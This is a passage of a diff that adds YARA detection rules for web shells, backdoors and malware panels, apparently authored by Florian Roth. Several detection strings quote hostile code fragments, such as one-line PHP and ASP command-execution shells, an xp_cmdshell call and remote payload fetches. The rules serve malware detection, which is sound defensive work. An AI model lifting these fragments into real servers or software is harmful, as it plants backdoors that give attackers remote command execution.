+		hash = "cb62e2ec40addd4b9930a9e270f5b318"
+	strings:
+		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+	condition:
+		all of them
+}
+rule PHP_sh {
+	meta:
+		description = "Webshells Auto-generated - file sh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1e9e879d49eb0634871e9b36f99fe528"
+	strings:
+		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+	condition:
+		all of them
+}
+rule xssshell_default {
+	meta:
+		description = "Webshells Auto-generated - file default.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d156782ae5e0b3724de3227b42fcaf2f"
+	strings:
+		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+	condition:
+		all of them
+}
+rule EditServer_Webshell_2 {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+	strings:
+		$s0 = "@HOTMAIL.COM"
+		$s1 = "Press Any Ke"
+		$s3 = "glish MenuZ"
+	condition:
+		all of them
+}
+rule by064cli {
+	meta:
+		description = "Webshells Auto-generated - file by064cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "10e0dff366968b770ae929505d2a9885"
+	strings:
+		$s7 = "packet dropped,redirecting"
+		$s9 = "input the password(the default one is 'by')"
+	condition:
+		all of them
+}
+rule Mithril_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+	strings:
+		$s0 = "please enter the password:"
+		$s3 = "\\dllTest.pdb"
+	condition:
+		all of them
+}
+rule peek_a_boo {
+	meta:
+		description = "Webshells Auto-generated - file peek-a-boo.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aca339f60d41fdcba83773be5d646776"
+	strings:
+		$s0 = "__vbaHresultCheckObj"
+		$s1 = "\\VB\\VB5.OLB"
+		$s2 = "capGetDriverDescriptionA"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s8 = "__vbaErrorOverflow"
+	condition:
+		all of them
+}
+rule fmlibraryv3 {
+	meta:
+		description = "Webshells Auto-generated - file fmlibraryv3.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c34c248fed6d5a20d8203924a2088acc"
+	strings:
+		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+	condition:
+		all of them
+}
+rule Debug_dllTest_2 {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s4 = "\\Debug\\dllTest.pdb"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule connector {
+	meta:
+		description = "Webshells Auto-generated - file connector.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3ba1827fca7be37c8296cd60be9dc884"
+	strings:
+		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
+		$s4 = "Add UNIQUE ID for victims / zombies"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_HideRun {
+	meta:
+		description = "Webshells Auto-generated - file HideRun.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45436d9bfd8ff94b71eeaeb280025afe"
+	strings:
+		$s0 = "Usage -- hiderun [AppName]"
+		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+	condition:
+		all of them
+}
+rule regshell {
+	meta:
+		description = "Webshells Auto-generated - file regshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
+	strings:
+		$s0 = "Changes the base hive to HKEY_CURRENT_USER."
+		$s4 = "Displays a list of values and sub-keys in a registry Hive."
+		$s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
+	condition:
+		all of them
+}
+rule PHP_Shell_v1_7 {
+	meta:
+		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b5978501c7112584532b4ca6fb77cba5"
+	strings:
+		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+	condition:
+		all of them
+}
+rule xssshell_save {
+	meta:
+		description = "Webshells Auto-generated - file save.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "865da1b3974e940936fe38e8e1964980"
+	strings:
+		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+		$s5 = "VictimID = fm_NStr(Victims(i))"
+	condition:
+		all of them
+}
+rule screencap {
+	meta:
+		description = "Webshells Auto-generated - file screencap.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "51139091dea7a9418a50f2712ea72aa6"
+	strings:
+		$s0 = "GetDIBColorTable"
+		$s1 = "Screen.bmp"
+		$s2 = "CreateDCA"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj_2 {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_zxrecv {
+	meta:
+		description = "Webshells Auto-generated - file zxrecv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+	strings:
+		$s0 = "RyFlushBuff"
+		$s1 = "teToWideChar^FiYP"
+		$s2 = "mdesc+8F D"
+		$s3 = "\\von76std"
+		$s4 = "5pur+virtul"
+		$s5 = "- Kablto io"
+		$s6 = "ac#f{lowi8a"
+	condition:
+		all of them
+}
+rule FSO_s_ajan {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s4 = "entrika.write \"BinaryStream.SaveToFile"
+	condition:
+		all of them
+}
+rule c99shell {
+	meta:
+		description = "Webshells Auto-generated - file c99shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+	strings:
+		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
+	condition:
+		all of them
+}
+rule phpspy_2005_full {
+	meta:
+		description = "Webshells Auto-generated - file phpspy_2005_full.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1c69bb152645438440e6c903bac16b2"
+	strings:
+		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4_2 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s4 = "\"Program Files\\Serv-u\\Serv"
+	condition:
+		all of them
+}
+rule httpdoor {
+	meta:
+		description = "Webshells Auto-generated - file httpdoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "6097ea963455a09474471a9864593dc3"
+	strings:
+		$s4 = "''''''''''''''''''DaJKHPam"
+		$s5 = "o,WideCharR]!n]"
+		$s6 = "HAutoComplete"
+		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
+	condition:
+		all of them
+}
+rule FSO_s_indexer_2 {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+		$s9 = "scrollbar-face-color:#E4E4F3;"
+	condition:
+		all of them
+}
+rule _root_040_zip_Folder_deploy {
+	meta:
+		description = "Webshells Auto-generated - file deploy.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c9f9c58999256c73a5ebdb10a9be269"
+	strings:
+		$s5 = "halon synscan 127.0.0.1 1-65536"
+		$s8 = "Obviously you replace the ip address with that of the target."
+
+	condition:
+		all of them
+}
+rule by063cli {
+	meta:
+		description = "Webshells Auto-generated - file by063cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "49ce26eb97fd13b6d92a5e5d169db859"
+	strings:
+		$s2 = "#popmsghello,are you all right?"
+		$s4 = "connect failed,check your network and remote ip."
+	condition:
+		all of them
+}
+rule icyfox007v1_10_rar_Folder_asp {
+	meta:
+		description = "Webshells Auto-generated - file asp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c412400b146b7b98d6e7755f7159bb9"
+	strings:
+		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule byshell063_ntboot_2 {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+	strings:
+		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+	condition:
+		all of them
+}
+rule u_uay {
+	meta:
+		description = "Webshells Auto-generated - file uay.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+	strings:
+		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+	condition:
+		1 of them
+}
+rule bin_wuaus {
+	meta:
+		description = "Webshells Auto-generated - file wuaus.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "46a365992bec7377b48a2263c49e4e7d"
+	strings:
+		$s1 = "9(90989@9V9^9f9n9v9"
+		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+		$s3 = ";(=@=G=O=T=X=\\="
+		$s4 = "TCP Send Error!!"
+		$s5 = "1\"1;1X1^1e1m1w1~1"
+		$s8 = "=$=)=/=<=Y=_=j=p=z="
+	condition:
+		all of them
+}
+rule pwreveal {
+	meta:
+		description = "Webshells Auto-generated - file pwreveal.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4e8447826a45b76ca45ba151a97ad50"
+	strings:
+		$s0 = "*<Blank - no es"
+		$s3 = "JDiamondCS "
+		$s8 = "sword set> [Leith=0 bytes]"
+		$s9 = "ION\\System\\Floating-"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_xwhois {
+	meta:
+		description = "Webshells Auto-generated - file xwhois.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0bc98bd576c80d921a3460f8be8816b4"
+	strings:
+		$s1 = "rting! "
+		$s2 = "aTypCog("
+		$s5 = "Diamond"
+		$s6 = "r)r=rQreryr"
+	condition:
+		all of them
+}
+rule vanquish_2 {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2dcb9055785a2ee01567f52b5a62b071"
+	strings:
+		$s2 = "Vanquish - DLL injection failed:"
+	condition:
+		all of them
+}
+rule down_rar_Folder_down {
+	meta:
+		description = "Webshells Auto-generated - file down.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db47d7a12b3584a2e340567178886e71"
+	strings:
+		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
+	condition:
+		all of them
+}
+rule cmdShell {
+	meta:
+		description = "Webshells Auto-generated - file cmdShell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a9fef43209b5d2d4b81dfbb45182036"
+	strings:
+		$s1 = "if cmdPath=\"wscriptShell\" then"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_nc {
+	meta:
+		description = "Webshells Auto-generated - file nc.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+	strings:
+		$s0 = "WSOCK32.dll"
+		$s1 = "?bSUNKNOWNV"
+		$s7 = "p@gram Jm6h)"
+		$s8 = "ser32.dllCONFP@"
+	condition:
+		all of them
+}
+rule portlessinst {
+	meta:
+		description = "Webshells Auto-generated - file portlessinst.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "74213856fc61475443a91cd84e2a6c2f"
+	strings:
+		$s2 = "Fail To Open Registry"
+		$s3 = "f<-WLEggDr\""
+		$s6 = "oMemoryCreateP"
+	condition:
+		all of them
+}
+rule SetupBDoor {
+	meta:
+		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "41f89e20398368e742eda4a3b45716b6"
+	strings:
+		$s1 = "\\BDoor\\SetupBDoor"
+	condition:
+		all of them
+}
+rule phpshell_3 {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+	strings:
+		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+	condition:
+		all of them
+}
+rule BIN_Server {
+	meta:
+		description = "Webshells Auto-generated - file Server.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+	strings:
+		$s0 = "configserver"
+		$s1 = "GetLogicalDrives"
+		$s2 = "WinExec"
+		$s4 = "fxftest"
+		$s5 = "upfileok"
+		$s7 = "upfileer"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006 {
+	meta:
+		description = "Webshells Auto-generated - file 2006.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c19d6f4e069188f19b08fa94d44bc283"
+	strings:
+		$s6 = "strBackDoor = strBackDoor "
+	condition:
+		all of them
+}
+rule r57shell_3 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "87995a49f275b6b75abe2521e03ac2c0"
+	strings:
+		$s1 = "<b>\".$_POST['cmd']"
+	condition:
+		all of them
+}
+rule HDConfig {
+	meta:
+		description = "Webshells Auto-generated - file HDConfig.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7d60e552fdca57642fd30462416347bd"
+	strings:
+		$s0 = "An encryption key is derived from the password hash. "
+		$s3 = "A hash object has been created. "
+		$s4 = "Error during CryptCreateHash!"
+		$s5 = "A new key container has been created."
+		$s6 = "The password has been added to the hash. "
+	condition:
+		all of them
+}
+rule FSO_s_ajan_2 {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+		$s3 = "/file.zip"
+	condition:
+		all of them
+}
+
+rule Webshell_and_Exploit_CN_APT_HK : Webshell
+{
+meta:
+	author = "Florian Roth"
+	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
+	date = "10.10.2014"
+	score = 50
+strings:
+	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+condition:
+	$a0 or ( all of ($s*) )
+}
+
+rule JSP_Browser_APT_webshell {
+	meta:
+		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
+		author = "F.Roth"
+		date = "10.10.2014"
+		score = 60
+	strings:
+		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell {
+	meta:
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+	strings:
+		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_2 {
+	meta:
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+	strings:
+		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+	condition:
+		all of ($a*) or all of ($s*)
+}
+
+rule AJAX_FileUpload_webshell {
+	meta:
+		description = "AJAX JS/CSS components providing web shell by APT groups"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 75
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
+	strings:
+		$a1 = "var frameId = 'jUploadFrame' + id;" ascii
+		$a2 = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
+		$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
+	condition:
+		all of them
+}
+
+rule Webshell_Insomnia {
+	meta:
+		description = "Insomnia Webshell - file InsomniaShell.aspx"
+		author = "Florian Roth"
+		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+		date = "2014/12/09"
+		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+		score = 80
+	strings:
+		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+	condition:
+		3 of them
+}
+
+rule HawkEye_PHP_Panel {
+	meta:
+		description = "Detects HawkEye Keyloggers PHP Panel"
+		author = "Florian Roth"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$s0 = "$fname = $_GET['fname'];" ascii fullword
+		$s1 = "$data = $_GET['data'];" ascii fullword
+		$s2 = "unlink($fname);" ascii fullword
+		$s3 = "echo \"Success\";" fullword ascii
+	condition:
+		all of ($s*) and filesize < 600
+}
+
+rule SoakSoak_Infected_Wordpress {
+	meta:
+		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		reference = "http://goo.gl/1GzWUX"
+		author = "Florian Roth"
+		date = "2014/12/15"
+		score = 60
+	strings:
+		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+		$s1 = "function FuncQueueObject()" ascii fullword
+		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+	condition:
+		all of ($s*)
+}
+
+rule Pastebin_Webshell {
+	meta:
+		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		author = "Florian Roth"
+		score = 70
+		date = "13.01.2015"
+		reference = "http://goo.gl/7dbyZs"
+	strings:
+		$s0 = "file_get_contents(\"http://pastebin.com" ascii
+		$s1 = "xcurl('http://pastebin.com/download.php" ascii
+		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
+
+		$x0 = "if($content){unlink('evex.php');" ascii
+		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+
+		$y0 = "file_put_contents($pth" ascii
+		$y1 = "echo \"<login_ok>" ascii
+		$y2 = "str_replace('* @package Wordpress',$temp" ascii
+	condition:
+		1 of ($s*) or all of ($x*) or all of ($y*)
+}
+
+rule ASPXspy2 {
+	meta:
+		description = "Web shell - file ASPXspy2.aspx"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/24"
+		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+	strings:
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+	condition:
+		6 of them
+}
+
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-11
+	Identifier: Web Shell Repo
+	Reference: https://github.com/nikicat/web-malware-collection
+*/
+
+rule Webshell_27_9_c66_c99 {
+	meta:
+		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
+		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
+		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+	strings:
+		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
+		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
+		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
+	condition:
+		filesize < 685KB and 1 of them
+}
+
+rule Webshell_acid_AntiSecShell_3 {
+	meta:
+		description = "Detects Webshell Acid"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
+		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+	condition:
+		filesize < 900KB and all of them
+}
+
+rule Webshell_c99_4 {
+	meta:
+		description = "Detects C99 Webshell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
